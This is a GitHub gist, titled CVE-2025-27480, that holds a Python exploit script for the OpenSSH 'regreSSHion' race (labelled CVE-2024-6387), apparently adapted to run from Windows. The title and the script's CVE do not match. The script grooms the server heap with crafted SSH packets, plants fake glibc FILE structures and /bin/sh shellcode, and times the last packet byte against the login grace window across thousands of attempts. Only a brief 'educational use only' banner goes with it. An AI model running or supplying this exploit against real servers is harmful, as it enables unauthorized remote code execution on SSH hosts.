Skip to content

Instantly share code, notes, and snippets.

@siteslave
Created March 19, 2026 04:50
Show Gist options
  • Select an option

  • Save siteslave/aeddba7236bb889ff47df37249cf4433 to your computer and use it in GitHub Desktop.

Select an option

Save siteslave/aeddba7236bb889ff47df37249cf4433 to your computer and use it in GitHub Desktop.
CVE-2025-27480
#!/usr/bin/env python3
"""
CVE-2024-6387 PoC - Windows Fixed Version
Resolves WinError 10022 and other Windows socket issues
"""
import socket
import struct
import time
import sys
import os
import errno
import select
import argparse
from datetime import datetime
# ============================================================================
# Platform Detection & Configuration
# ============================================================================
IS_WINDOWS = sys.platform.startswith('win')
IS_LINUX = sys.platform.startswith('linux')
MAX_PACKET_SIZE = 256 * 1024
LOGIN_GRACE_TIME = 120
# Windows-specific timing adjustments
if IS_WINDOWS:
TIMING_PRECISION = 0.002
SOCKET_TIMEOUT = 3.0
CONNECT_TIMEOUT = 5.0
else:
TIMING_PRECISION = 0.001
SOCKET_TIMEOUT = 1.0
CONNECT_TIMEOUT = 3.0
def chunk_align(size):
return (size + 15) & ~15
# glibc base addresses (ปรับตามเป้าหมาย)
GLIBC_BASES = [0xb7200000, 0xb7400000, 0xb7600000]
# Shellcode placeholder
SHELLCODE = (
b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x90\x90\x90"
)
# ============================================================================
# Logging Functions
# ============================================================================
def log(msg, level="INFO"):
timestamp = datetime.now().strftime("%H:%M:%S.%f")[:-3]
colors = {
"INFO": "\033[94m",
"SUCCESS": "\033[92m",
"WARNING": "\033[93m",
"ERROR": "\033[91m",
"DEBUG": "\033[90m",
}
reset = "\033[0m" if not IS_WINDOWS else ""
color = colors.get(level, "")
print(f"{color}[{timestamp}] [{level}] {msg}{reset}")
def log_debug(msg):
if args.verbose:
log(msg, "DEBUG")
# ============================================================================
# Socket Functions - FIXED FOR WINDOWS
# ============================================================================
def setup_connection(ip, port):
"""
Create TCP connection - FIXED to avoid WinError 10022
"""
sock = None
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# ✅ FIXED: Set socket options BEFORE connect, and only compatible ones
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# ❌ REMOVED: SO_EXCLUSIVEADDRUSE causes WinError 10022 on some Windows versions
# if IS_WINDOWS:
# sock.setsockopt(socket.SOL_SOCKET, socket.SO_EXCLUSIVEADDRUSE, 1)
if IS_WINDOWS:
# Windows: Use blocking mode for connect (more reliable)
sock.settimeout(CONNECT_TIMEOUT)
log_debug(f"Connecting to {ip}:{port}...")
sock.connect((ip, port))
# Switch to non-blocking after connection established
sock.setblocking(False)
log_debug("Connected, switched to non-blocking mode")
else:
# Linux: Non-blocking connect
sock.setblocking(False)
result = sock.connect_ex((ip, port))
if result == 0:
pass
elif result == errno.EINPROGRESS:
_, writable, _ = select.select([], [sock], [], CONNECT_TIMEOUT)
if not writable:
log("Connection timeout", "ERROR")
sock.close()
return None
err = sock.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
if err != 0:
log(f"Connection failed: {os.strerror(err)}", "ERROR")
sock.close()
return None
else:
log(f"Connect error: {os.strerror(result)}", "ERROR")
sock.close()
return None
return sock
except socket.timeout:
log("Connection timeout", "ERROR")
except ConnectionRefusedError:
log(f"Connection refused by {ip}:{port}", "ERROR")
except OSError as e:
win_err = getattr(e, 'winerror', None)
if win_err == 10061:
log("Connection refused (WinError 10061)", "ERROR")
elif win_err == 10060:
log("Connection timeout (WinError 10060)", "ERROR")
elif win_err == 10022:
log("Invalid argument (WinError 10022) - check socket options", "ERROR")
else:
log(f"Socket OS error (winerror={win_err}): {e}", "ERROR")
except Exception as e:
log(f"setup_connection error: {type(e).__name__}: {e}", "ERROR")
if sock:
try:
sock.close()
except:
pass
return None
def is_socket_connected(sock):
"""Check if socket is still connected"""
if sock is None:
return False
try:
sock.getpeername()
if IS_WINDOWS:
try:
_, _, err = select.select([], [], [sock], 0)
if err:
return False
except:
return False
return True
except OSError as e:
win_err = getattr(e, 'winerror', None)
if win_err in [10053, 10054, 10038, 10057, 10022]:
return False
return False
except:
return False
def send_packet(sock, packet_type, data, allow_partial=False):
"""Send SSH packet - Windows-compatible"""
if not is_socket_connected(sock):
log("Cannot send: socket disconnected", "ERROR")
return False
try:
packet_len = len(data) + 5
header = struct.pack('>I', packet_len)
packet = header + bytes([packet_type]) + data
# Windows: Send in chunks for large packets
if IS_WINDOWS and len(packet) > 16384:
chunk_size = 16384
total_sent = 0
while total_sent < len(packet):
chunk = packet[total_sent:total_sent + chunk_size]
sent = sock.send(chunk)
if sent == 0:
log("Socket send returned 0", "ERROR")
return False
total_sent += sent
if total_sent < len(packet):
time.sleep(0.001)
else:
sock.sendall(packet)
log_debug(f"Sent packet: type={packet_type}, len={len(packet)}")
return True
except BrokenPipeError:
log("Broken pipe - server closed connection", "WARNING")
return False
except ConnectionResetError:
log("Connection reset by peer", "WARNING")
return False
except ConnectionAbortedError:
log("Connection aborted", "WARNING")
return False
except OSError as e:
win_err = getattr(e, 'winerror', None)
if win_err == 10053:
log("[WinError 10053] Connection aborted", "WARNING")
return False
elif win_err == 10054:
log("[WinError 10054] Connection reset", "WARNING")
return False
elif win_err == 10022:
log("[WinError 10022] Invalid argument - socket may be invalid", "ERROR")
return False
elif win_err == 10035: # WSAEWOULDBLOCK
if allow_partial:
return True
log("Socket would block", "WARNING")
return False
else:
log(f"send_packet OSError (winerror={win_err}): {e}", "ERROR")
return False
except Exception as e:
log(f"send_packet error: {type(e).__name__}: {e}", "ERROR")
return False
def recv_nonblocking(sock, bufsize, timeout=None):
"""Receive data with timeout"""
if timeout is None:
timeout = SOCKET_TIMEOUT
start = time.monotonic()
data = b""
while True:
elapsed = time.monotonic() - start
if elapsed >= timeout:
break
try:
chunk = sock.recv(bufsize)
if chunk:
data += chunk
break
if not chunk:
break
except BlockingIOError:
time.sleep(0.01 if IS_WINDOWS else 0.001)
continue
except ConnectionResetError:
break
except OSError as e:
win_err = getattr(e, 'winerror', None)
if win_err in [10053, 10054, 10022]:
break
elif win_err == 10035:
time.sleep(0.01 if IS_WINDOWS else 0.001)
continue
else:
break
except:
break
return data
# ============================================================================
# SSH Protocol Functions
# ============================================================================
def send_ssh_version(sock):
version = b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1\r\n"
try:
sock.sendall(version)
return True
except Exception as e:
log(f"send_ssh_version error: {e}", "ERROR")
return False
def receive_ssh_version(sock, timeout=3.0):
try:
data = recv_nonblocking(sock, 256, timeout=timeout)
if data:
try:
log(f"Received SSH version: {data.decode('ascii', errors='replace').strip()}")
except:
log(f"Received: {data[:50]}", "DEBUG")
return True
except Exception as e:
log(f"receive_ssh_version error: {e}", "DEBUG")
log("Failed to receive SSH version", "ERROR")
return False
def send_kex_init(sock):
kexinit_payload = bytes(36)
return send_packet(sock, 20, kexinit_payload)
def receive_kex_init(sock, timeout=2.0):
try:
data = recv_nonblocking(sock, 2048, timeout=timeout)
if data and len(data) >= 5:
log(f"Received KEX_INIT ({len(data)} bytes)", "DEBUG")
return True
except Exception as e:
log(f"receive_kex_init error: {e}", "DEBUG")
return False
def perform_ssh_handshake(sock):
log("Performing SSH handshake...", "DEBUG")
if not send_ssh_version(sock):
return False
if not receive_ssh_version(sock):
return False
if not send_kex_init(sock):
return False
return True
# ============================================================================
# Heap Manipulation Functions
# ============================================================================
def prepare_heap(sock):
log("Preparing heap layout...", "DEBUG")
for i in range(10):
tcache_chunk = b'A' * 64
send_packet(sock, 5, tcache_chunk)
for i in range(27):
large_hole = b'B' * 8192
send_packet(sock, 5, large_hole)
small_hole = b'C' * 320
send_packet(sock, 5, small_hole)
for i in range(27):
fake_data = create_fake_file_structure(4096, GLIBC_BASES[0])
send_packet(sock, 5, fake_data)
large_string = b'E' * (MAX_PACKET_SIZE - 1)
send_packet(sock, 5, large_string)
log("Heap preparation complete", "DEBUG")
def create_fake_file_structure(size, glibc_base):
data = bytearray(size)
struct.pack_into('<I', data, 0x88, 0x61)
fake_vtable = glibc_base + 0x21b740
fake_codecvt = glibc_base + 0x21d7f8
struct.pack_into('<I', data, size - 8, fake_vtable & 0xFFFFFFFF)
struct.pack_into('<I', data, size - 4, fake_codecvt & 0xFFFFFFFF)
return bytes(data)
# ============================================================================
# Timing Functions
# ============================================================================
def measure_response_time(sock, error_type, timeout=1.0):
if error_type == 1:
error_packet = b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3"
else:
error_packet = b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAQQDZy9"
start = time.monotonic()
send_packet(sock, 50, error_packet)
recv_nonblocking(sock, 1024, timeout=timeout)
end = time.monotonic()
return end - start
def time_final_packet(sock):
log("Measuring packet parsing time...", "DEBUG")
times = []
for error_type in [1, 2, 1, 2]:
t = measure_response_time(sock, error_type)
times.append(t)
time.sleep(0.01)
times.sort()
parsing_time = (times[1] + times[2]) / 2 if len(times) >= 4 else times[0]
log(f"Estimated parsing time: {parsing_time:.6f} seconds", "INFO")
return parsing_time
# ============================================================================
# Exploit Core Functions
# ============================================================================
def create_public_key_packet(size, glibc_base):
packet = bytearray(size)
offset = 0
for i in range(27):
large_size = chunk_align(4096)
struct.pack_into('<I', packet, offset, large_size)
offset += large_size
small_size = chunk_align(304)
struct.pack_into('<I', packet, offset, small_size)
offset += small_size
packet[0:8] = b"ssh-rsa "
shellcode_offset = chunk_align(4096) * 13 + chunk_align(304) * 13
if shellcode_offset + len(SHELLCODE) <= size:
packet[shellcode_offset:shellcode_offset+len(SHELLCODE)] = SHELLCODE
for i in range(27):
file_offset = chunk_align(4096) * (i + 1) + chunk_align(304) * i
if file_offset + 304 <= size:
fake_file = create_fake_file_structure(304, glibc_base)
packet[file_offset:file_offset+304] = fake_file[:304]
return bytes(packet)
def attempt_race_condition(sock, parsing_time, glibc_base):
log(f"Attempting race condition (glibc: 0x{glibc_base:x})...", "INFO")
if not is_socket_connected(sock):
log("Socket disconnected before exploit", "ERROR")
return False
final_packet = create_public_key_packet(MAX_PACKET_SIZE, glibc_base)
try:
log_debug(f"Sending packet body ({len(final_packet)-1} bytes)...")
if not send_packet(sock, 5, final_packet[:-1], allow_partial=True):
log("Failed to send packet body", "WARNING")
return False
timing_buffer = TIMING_PRECISION * 2
target_elapsed = LOGIN_GRACE_TIME - parsing_time - timing_buffer
if target_elapsed < 0:
log(f"Invalid timing: {target_elapsed:.3f}s", "ERROR")
return False
log_debug(f"Target send time: {target_elapsed:.3f}s")
start = time.monotonic()
while True:
if not is_socket_connected(sock):
log("Connection lost during timing", "WARNING")
return False
elapsed = time.monotonic() - start
remaining = target_elapsed - elapsed
if remaining <= 0:
log_debug(f"Sending final byte at {elapsed:.6f}s")
try:
sock.sendall(final_packet[-1:])
break
except OSError as e:
win_err = getattr(e, 'winerror', None)
if win_err == 10053:
log("Connection aborted on final byte", "WARNING")
return False
raise
except Exception as e:
log(f"Error sending final byte: {e}", "ERROR")
return False
sleep_time = min(0.002 if IS_WINDOWS else 0.0005, max(0, remaining * 0.1))
if sleep_time > 0:
time.sleep(sleep_time)
log("Checking for exploitation indicators...", "DEBUG")
try:
sock.settimeout(0.05 if IS_WINDOWS else 0.02)
response = sock.recv(1024)
sock.setblocking(False)
if response:
log(f"Received {len(response)} bytes post-exploit", "DEBUG")
if not response.startswith(b"SSH-2.0-"):
log("Possible race window hit!", "SUCCESS")
return True
except socket.timeout:
log("No response - ambiguous result", "WARNING")
return True
except ConnectionResetError:
log("Connection reset - possible success!", "SUCCESS")
return True
except OSError as e:
win_err = getattr(e, 'winerror', None)
if win_err == 10053:
log("Connection aborted post-exploit", "WARNING")
return True
raise
except Exception as e:
log(f"attempt_race_condition error: {type(e).__name__}: {e}", "ERROR")
return False
return False
# ============================================================================
# Main Exploit Loop
# ============================================================================
def exploit_target(ip, port, max_attempts=20000):
log(f"Targeting {ip}:{port}", "INFO")
log(f"Max attempts: {max_attempts}", "INFO")
log(f"Platform: {'Windows' if IS_WINDOWS else 'Linux/Unix'}", "INFO")
if IS_WINDOWS:
log("⚠️ Windows detected: timing precision ~2ms", "WARNING")
success = False
total_attempts = 0
for base_idx, glibc_base in enumerate(GLIBC_BASES):
if success:
break
log(f"\n[*] glibc base: 0x{glibc_base:x}", "INFO")
for attempt in range(max_attempts // len(GLIBC_BASES)):
total_attempts += 1
if attempt % 1000 == 0 and attempt > 0:
log(f"Progress: {attempt}/{max_attempts // len(GLIBC_BASES)}", "INFO")
sock = setup_connection(ip, port)
if not sock:
continue
if not perform_ssh_handshake(sock):
sock.close()
continue
prepare_heap(sock)
parsing_time = time_final_packet(sock)
if attempt_race_condition(sock, parsing_time, glibc_base):
log(f"\n[!] Possible success!", "SUCCESS")
log(f" Attempts: {total_attempts}", "SUCCESS")
success = True
break
try:
sock.close()
except:
pass
time.sleep(0.1)
log(f"\nComplete. Total attempts: {total_attempts}", "INFO")
return success
# ============================================================================
# Debug & Utility Functions
# ============================================================================
def debug_connection_test(ip, port):
log(f"Debug: Testing {ip}:{port}", "INFO")
sock = setup_connection(ip, port)
if not sock:
log("Debug: Failed to connect", "ERROR")
return False
log("Debug: Connected", "SUCCESS")
if send_ssh_version(sock):
log("Debug: Sent version", "SUCCESS")
else:
log("Debug: Failed to send version", "ERROR")
sock.close()
return False
response = recv_nonblocking(sock, 256, timeout=3.0)
if response:
log(f"Debug: Received: {response[:100]}", "INFO")
else:
log("Debug: No response", "WARNING")
if send_packet(sock, 5, b"test"):
log("Debug: Sent test packet", "SUCCESS")
else:
log("Debug: Failed test packet", "WARNING")
sock.close()
log("Debug: Complete", "INFO")
return True
def check_target_version(ip, port):
log(f"Checking OpenSSH version on {ip}:{port}...", "INFO")
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5.0)
sock.connect((ip, port))
banner = b""
while b"\n" not in banner:
chunk = sock.recv(256)
if not chunk:
break
banner += chunk
sock.close()
banner_str = banner.decode('ascii', errors='replace').strip()
log(f"Banner: {banner_str}", "INFO")
if "OpenSSH_" in banner_str:
version_part = banner_str.split("OpenSSH_")[1].split()[0]
log(f"Version: {version_part}", "INFO")
try:
major, minor = map(int, version_part.replace('p', '.').split('.')[:2])
if (major == 8 and minor >= 5) or (major == 9 and minor < 8):
log("⚠️ MAY BE VULNERABLE", "WARNING")
else:
log("✓ Appears patched", "SUCCESS")
except:
log("Could not parse version", "WARNING")
return True
except Exception as e:
log(f"Version check error: {e}", "ERROR")
return False
# ============================================================================
# Entry Point
# ============================================================================
def parse_arguments():
parser = argparse.ArgumentParser(
description="CVE-2024-6387 PoC (Windows-Fixed)"
)
parser.add_argument("target", help="Target IP")
parser.add_argument("port", type=int, nargs="?", default=22, help="Port (default: 22)")
parser.add_argument("-a", "--attempts", type=int, default=20000, help="Max attempts")
parser.add_argument("-g", "--glibc", action="append", type=lambda x: int(x, 16), help="glibc base (hex)")
parser.add_argument("-c", "--check", action="store_true", help="Check version only")
parser.add_argument("-d", "--debug", action="store_true", help="Debug connection")
parser.add_argument("-v", "--verbose", action="store_true", help="Verbose output")
return parser.parse_args()
def main():
global args
args = parse_arguments()
if args.glibc:
GLIBC_BASES[:] = args.glibc
if args.debug:
return 0 if debug_connection_test(args.target, args.port) else 1
if args.check:
return 0 if check_target_version(args.target, args.port) else 1
print("=" * 70)
print("CVE-2024-6387 regreSSHion - Windows-Fixed PoC")
print("=" * 70)
print("[!] EDUCATIONAL USE ONLY")
print("[!] Use in authorized environments only")
print("=" * 70)
try:
result = exploit_target(args.target, args.port, max_attempts=args.attempts)
return 0 if result else 1
except KeyboardInterrupt:
log("\nInterrupted", "INFO")
return 130
except Exception as e:
log(f"Fatal: {type(e).__name__}: {e}", "ERROR")
if args.verbose:
import traceback
traceback.print_exc()
return 2
if __name__ == "__main__":
sys.exit(main())
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment